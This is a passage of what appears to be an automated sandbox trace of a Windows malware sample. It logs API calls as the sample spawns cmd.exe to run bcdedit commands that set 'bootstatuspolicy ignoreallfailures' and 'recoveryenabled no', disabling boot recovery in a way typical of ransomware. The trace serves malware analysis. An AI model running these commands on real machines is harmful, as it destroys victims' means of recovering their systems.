[0045.065] GetProcessHeap () returned 0x360000 [0045.065] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x361320) returned 0x6c [0045.065] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0045.065] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0045.066] GetProcessHeap () returned 0x360000 [0045.066] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x128) returned 0x379d00 [0045.066] GetProcessHeap () returned 0x360000 [0045.066] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x240) returned 0x3613a0 [0045.071] GetProcessHeap () returned 0x360000 [0045.071] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x3613a0, Size=0x12a) returned 0x3613a0 [0045.071] GetProcessHeap () returned 0x360000 [0045.071] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x3613a0) returned 0x12a [0045.071] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0045.071] GetProcessHeap () returned 0x360000 [0045.072] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xe8) returned 0x379e30 [0045.072] GetProcessHeap () returned 0x360000 [0045.072] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x379e30, Size=0x7e) returned 0x379e30 [0045.072] GetProcessHeap () returned 0x360000 [0045.072] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x379e30) returned 0x7e [0045.073] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.073] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x26f130, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f130) returned 0xffffffffffffffff [0045.073] GetLastError () returned 0x2 [0045.073] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x26f130, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f130) returned 0xffffffffffffffff [0045.073] GetLastError () returned 0x2 [0045.073] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.073] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x26f130, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f130) returned 0x379ec0 [0045.073] GetProcessHeap () returned 0x360000 [0045.073] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x28) returned 0x374660 [0045.073] FindClose (in: hFindFile=0x379ec0 | out: hFindFile=0x379ec0) returned 1 [0045.073] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x26f130, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f130) returned 0xffffffffffffffff [0045.073] GetLastError () returned 0x2 [0045.073] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x26f130, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f130) returned 0x379ec0 [0045.074] GetProcessHeap () returned 0x360000 [0045.074] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x374660, Size=0x8) returned 0x3789a0 [0045.074] FindClose (in: hFindFile=0x379ec0 | out: hFindFile=0x379ec0) returned 1 [0045.074] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0045.074] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0045.074] GetConsoleTitleW (in: lpConsoleTitle=0x26f680, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0045.074] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f438, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f3f8 | out: lpAttributeList=0x26f438, lpSize=0x26f3f8) returned 1 [0045.074] UpdateProcThreadAttribute (in: lpAttributeList=0x26f438, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f3e8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f438, lpPreviousValue=0x0) returned 1 [0045.074] GetStartupInfoW (in: lpStartupInfo=0x26f550 | out: lpStartupInfo=0x26f550*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0045.074] GetProcessHeap () returned 0x360000 [0045.074] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x20) returned 0x374660 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.074] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0045.075] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0045.075] GetProcessHeap () returned 0x360000 [0045.075] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x374660 | out: hHeap=0x360000) returned 1 [0045.075] GetProcessHeap () returned 0x360000 [0045.075] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x12) returned 0x379ec0 [0045.075] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0045.077] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x26f470*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit /set {default} bootstatuspolicy ignoreallfailures", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f420 | out: lpCommandLine="bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x26f420*(hProcess=0x54, hThread=0x50, dwProcessId=0x5dc, dwThreadId=0x7bc)) returned 1 [0045.080] CloseHandle (hObject=0x50) returned 1 [0045.080] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0045.080] GetProcessHeap () returned 0x360000 [0045.080] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37c2d0 | out: hHeap=0x360000) returned 1 [0045.080] GetEnvironmentStringsW () returned 0x37acd0* [0045.080] GetProcessHeap () returned 0x360000 [0045.080] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xae8) returned 0x37b7c0 [0045.080] FreeEnvironmentStringsW (penv=0x37acd0) returned 1 [0045.080] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0045.570] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x26f368 | out: lpExitCode=0x26f368*=0x0) returned 1 [0045.570] CloseHandle (hObject=0x54) returned 1 [0045.570] _vsnwprintf (in: _Buffer=0x26f5d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f378 | out: _Buffer="00000000") returned 8 [0045.570] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0045.571] GetProcessHeap () returned 0x360000 [0045.571] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37b7c0 | out: hHeap=0x360000) returned 1 [0045.571] GetEnvironmentStringsW () returned 0x37acd0* [0045.571] GetProcessHeap () returned 0x360000 [0045.571] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xb0e) returned 0x37cdd0 [0045.571] FreeEnvironmentStringsW (penv=0x37acd0) returned 1 [0045.571] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0045.571] GetProcessHeap () returned 0x360000 [0045.571] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37cdd0 | out: hHeap=0x360000) returned 1 [0045.571] GetEnvironmentStringsW () returned 0x37acd0* [0045.571] GetProcessHeap () returned 0x360000 [0045.571] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xb0e) returned 0x37cdd0 [0045.571] FreeEnvironmentStringsW (penv=0x37acd0) returned 1 [0045.571] GetProcessHeap () returned 0x360000 [0045.571] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x379ec0 | out: hHeap=0x360000) returned 1 [0045.571] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f438 | out: lpAttributeList=0x26f438) [0045.571] _get_osfhandle (_FileHandle=1) returned 0x7 [0045.571] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0045.571] _get_osfhandle (_FileHandle=1) returned 0x7 [0045.571] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d4e194 | out: lpMode=0x49d4e194) returned 1 [0045.572] _get_osfhandle (_FileHandle=0) returned 0x3 [0045.572] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d4e198 | out: lpMode=0x49d4e198) returned 1 [0045.572] SetConsoleInputExeNameW () returned 0x1 [0045.572] GetConsoleOutputCP () returned 0x1b5 [0045.572] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0045.572] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0045.572] exit (_Code=0) Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x3368c000" os_pid = "0xa54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x6dc" cmd_line = "/C bcdedit /set {default} recoveryenabled no" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 24 os_tid = 0x570 [0043.727] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af970 | out: lpSystemTimeAsFileTime=0x1af970*(dwLowDateTime=0x26bbb7f0, dwHighDateTime=0x1d5f247)) [0043.727] GetCurrentProcessId () returned 0xa54 [0043.727] GetCurrentThreadId () returned 0x570 [0043.727] GetTickCount () returned 0x1145b1b [0043.727] QueryPerformanceCounter (in: lpPerformanceCount=0x1af978 | out: lpPerformanceCount=0x1af978*=16458962679) returned 1 [0043.728] GetModuleHandleW (lpModuleName=0x0) returned 0x49d20000 [0043.728] __set_app_type (_Type=0x1) [0043.728] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49d47810) returned 0x0 [0043.729] __getmainargs (in: _Argc=0x49d6a608, _Argv=0x49d6a618, _Env=0x49d6a610, _DoWildCard=0, _StartInfo=0x49d4e0f4 | out: _Argc=0x49d6a608, _Argv=0x49d6a618, _Env=0x49d6a610) returned 0 [0043.729] GetCurrentThreadId () returned 0x570 [0043.729] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x570) returned 0x3c [0043.858] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0043.859] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0043.859] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0043.859] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0043.859] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af908 | out: phkResult=0x1af908*=0x0) returned 0x2 [0043.859] VirtualQuery (in: lpAddress=0x1af8f0, lpBuffer=0x1af870, dwLength=0x30 | out: lpBuffer=0x1af870*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.859] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1af870, dwLength=0x30 | out: lpBuffer=0x1af870*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.859] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1af870, dwLength=0x30 | out: lpBuffer=0x1af870*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.859] VirtualQuery (in: lpAddress=0xb4000, lpBuffer=0x1af870, dwLength=0x30 | out: lpBuffer=0x1af870*(BaseAddress=0xb4000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.859] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1af870, dwLength=0x30 | out: lpBuffer=0x1af870*(BaseAddress=0x1b0000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x20000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0043.859] GetConsoleOutputCP () returned 0x1b5 [0043.861] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0043.862] SetConsoleCtrlHandler (HandlerRoutine=0x49d43184, Add=1) returned 1 [0043.862] _get_osfhandle (_FileHandle=1) returned 0x7 [0043.862] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0043.865] _get_osfhandle (_FileHandle=1) returned 0x7 [0043.865] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d4e194 | out: lpMode=0x49d4e194) returned 1 [0043.866] _get_osfhandle (_FileHandle=1) returned 0x7 [0043.866] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0043.866] _get_osfhandle (_FileHandle=0) returned 0x3 [0043.866] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d4e198 | out: lpMode=0x49d4e198) returned 1 [0043.866] GetEnvironmentStringsW () returned 0x1e8ab0* [0043.866] GetProcessHeap () returned 0x1d0000 [0043.866] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xa7c) returned 0x1e9540 [0043.866] FreeEnvironmentStringsW (penv=0x1e8ab0) returned 1 [0043.866] GetProcessHeap () returned 0x1d0000 [0043.866] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x8) returned 0x1e8350 [0043.866] GetEnvironmentStringsW () returned 0x1e8ab0* [0043.867] GetProcessHeap () returned 0x1d0000 [0043.867] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xa7c) returned 0x1e9fd0 [0043.867] FreeEnvironmentStringsW (penv=0x1e8ab0) returned 1 [0043.867] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae7c8 | out: phkResult=0x1ae7c8*=0x44) returned 0x0 [0043.867] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae7c0, lpData=0x1ae7e0, lpcbData=0x1ae7c4*=0x1000 | out: lpType=0x1ae7c0*=0x0, lpData=0x1ae7e0*=0x18, lpcbData=0x1ae7c4*=0x1000) returned 0x2 [0043.867] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae7c0, lpData=0x1ae7e0, lpcbData=0x1ae7c4*=0x1000 | out: lpType=0x1ae7c0*=0x4, lpData=0x1ae7e0*=0x1, lpcbData=0x1ae7c4*=0x4) returned 0x0 [0043.867] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae7c0, lpData=0x1ae7e0, lpcbData=0x1ae7c4*=0x1000 | out: lpType=0x1ae7c0*=0x0, lpData=0x1ae7e0*=0x1, lpcbData=0x1ae7c4*=0x1000) returned 0x2 [0043.867] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae7c0, lpData=0x1ae7e0, lpcbData=0x1ae7c4*=0x1000 | out: lpType=0x1ae7c0*=0x4, lpData=0x1ae7e0*=0x0, lpcbData=0x1ae7c4*=0x4) returned 0x0 [0043.867] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae7c0, lpData=0x1ae7e0, lpcbData=0x1ae7c4*=0x1000 | out: lpType=0x1ae7c0*=0x4, lpData=0x1ae7e0*=0x40, lpcbData=0x1ae7c4*=0x4) returned 0x0 [0043.867] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae7c0, lpData=0x1ae7e0, lpcbData=0x1ae7c4*=0x1000 | out: lpType=0x1ae7c0*=0x4, lpData=0x1ae7e0*=0x40, lpcbData=0x1ae7c4*=0x4) returned 0x0 [0043.867] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae7c0, lpData=0x1ae7e0, lpcbData=0x1ae7c4*=0x1000 | out: lpType=0x1ae7c0*=0x0, lpData=0x1ae7e0*=0x40, lpcbData=0x1ae7c4*=0x1000) returned 0x2 [0043.867] RegCloseKey (hKey=0x44) returned 0x0 [0043.867] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae7c8 | out: phkResult=0x1ae7c8*=0x44) returned 0x0 [0043.867] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae7c0, lpData=0x1ae7e0, lpcbData=0x1ae7c4*=0x1000 | out: lpType=0x1ae7c0*=0x0, lpData=0x1ae7e0*=0x40, lpcbData=0x1ae7c4*=0x1000) returned 0x2 [0043.867] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae7c0, lpData=0x1ae7e0, lpcbData=0x1ae7c4*=0x1000 | out: lpType=0x1ae7c0*=0x4, lpData=0x1ae7e0*=0x1, lpcbData=0x1ae7c4*=0x4) returned 0x0 [0043.867] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae7c0, lpData=0x1ae7e0, lpcbData=0x1ae7c4*=0x1000 | out: lpType=0x1ae7c0*=0x0, lpData=0x1ae7e0*=0x1, lpcbData=0x1ae7c4*=0x1000) returned 0x2 [0043.867] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae7c0, lpData=0x1ae7e0, lpcbData=0x1ae7c4*=0x1000 | out: lpType=0x1ae7c0*=0x4, lpData=0x1ae7e0*=0x0, lpcbData=0x1ae7c4*=0x4) returned 0x0 [0043.867] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae7c0, lpData=0x1ae7e0, lpcbData=0x1ae7c4*=0x1000 | out: lpType=0x1ae7c0*=0x4, lpData=0x1ae7e0*=0x9, lpcbData=0x1ae7c4*=0x4) returned 0x0 [0043.867] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae7c0, lpData=0x1ae7e0, lpcbData=0x1ae7c4*=0x1000 | out: lpType=0x1ae7c0*=0x4, lpData=0x1ae7e0*=0x9, lpcbData=0x1ae7c4*=0x4) returned 0x0 [0043.868] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae7c0, lpData=0x1ae7e0, lpcbData=0x1ae7c4*=0x1000 | out: lpType=0x1ae7c0*=0x0, lpData=0x1ae7e0*=0x9, lpcbData=0x1ae7c4*=0x1000) returned 0x2 [0043.868] RegCloseKey (hKey=0x44) returned 0x0 [0043.868] time (in: timer=0x0 | out: timer=0x0) returned 0x5e5fdfec [0043.868] srand (_Seed=0x5e5fdfec) [0043.868] GetCommandLineW () returned="/C bcdedit /set {default} recoveryenabled no" [0043.868] GetCommandLineW () returned="/C bcdedit /set {default} recoveryenabled no" [0043.868] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49d5c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0043.868] GetProcessHeap () returned 0x1d0000 [0043.868] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x218) returned 0x1eaa60 [0043.868] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1eaa70, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0043.868] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0043.868] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0043.868] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0043.868] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0043.868] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0043.868] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0043.868] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0043.868] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0043.868] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0043.868] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0043.868] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0043.868] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0043.868] GetProcessHeap () returned 0x1d0000 [0043.868] HeapFree (in: hHeap=0x1d0000, dwFlags=0x0, lpMem=0x1e9540 | out: hHeap=0x1d0000) returned 1 [0043.869] GetEnvironmentStringsW () returned 0x1e8ab0* [0043.869] GetProcessHeap () returned 0x1d0000 [0043.869] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xa94) returned 0x1eac80 [0043.869] FreeEnvironmentStringsW (penv=0x1e8ab0) returned 1 [0043.869] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0043.869] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0043.869] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0043.869] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0043.869] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0043.869] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0043.869] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0043.869] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0043.869] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0043.869] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0043.869] GetProcessHeap () returned 0x1d0000 [0043.869] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x5c) returned 0x1eb720 [0043.869] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af5d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0043.869] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", 